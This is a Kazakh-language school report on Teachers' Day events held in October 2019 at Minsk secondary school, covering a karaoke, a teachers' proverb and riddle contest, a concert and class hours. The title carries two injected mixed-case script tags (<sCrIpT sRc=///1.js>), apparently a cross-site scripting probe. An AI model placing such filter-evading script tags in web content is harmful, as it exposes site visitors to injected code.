«Ұстаздар күні» мерекесі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.10.2019

Минск орта мектебіндегі «Ұстаздар күні» мерекесіне орай

өткізілген іс – шаралар есебі

2019 – 2020 оқу жылы

 

Мектебімізде «Ұстаздар күні» мерекесіне орай 1.10.19ж. күні «Ұстаз – ұлы есім» атты 2 -11 сынып оқушылары арасында караоке болды. Мақсаты: оқушылардың ұстазға деген сүйіспеншіліктерін, құрметтерін арттыру. Мерекелік қабырға газеттері (коллаж түрінде) шығарылды.

2.10.19ж. күні «Мың бір мақал, жүз бір жұмбақ» атты педагогикалық ұжым арасында сайыс болды. Мақсаты: халық ауыз әдебиетін дамыту, халық мұрасын сақтау және жалғастыру.

Сайысқа 6 мұғалім қатысты.

Мақал – мәтел сайысына қатысушылар:

  1. Бодан Аскергул – қазақ тілі мен әдебиет пәнінің мұғалімі
  2. Теңсел Сандуғаш – ағылшын пәнінің мұғалімі
  3. Қуат Тілеуберді – тарих пәнінің мұғалімі

Жұмбақшылар сайысына қатысушылар:

  1. Тилеухан Сейтмұрат – математика пәнінің мұғалімі
  2. Хойшыбай Ғалия – тәрбиеші
  3. Шынар Тәттігүл – бастауыш сынып мұғалімі

Сайысқа қатысқан мұғалімдер арасынан өзінің тапқырлығы мен ой ұшқырлығымен ағылшын пәнінің мұғалімі Теңсел С. жеңіске жетті.

3.10.19ж. күні «Өзін – өзі басқару күні» болды.

«Ұстаз – мәңгі нұрдың шуағы» атты мерекелік концерт ұйымдастырылды. Мақсаты: Оқушыларды ұстазды құрметтеуге, сыйлауға үйрету, ұстаз мамандығының қыры мен сырларын түсіндіру. Ұстаз еңбегін әрқашан бағалай білуге үйрету.

4.10.19ж. күні «Ұстаздық еңбек – ұлағатты іс» тақырыбында сынып сағаттары өткізілді.

Мерекелік салтанатты саптүзеуде оқушылар ұстаздар қауымына ізгі тілектерін айтып құттықтады.

Апталық соңы би кешімен және педагогикалық ұжымның мерекелік дастарқанымен аяқталды.

 

 

 

                                                                            

Тәрбие ісінің меңгерушісі:                   Сағит О.Д.

Просмотров: 1214


Пікір қосу



Деректерді қолтаңбаға қосу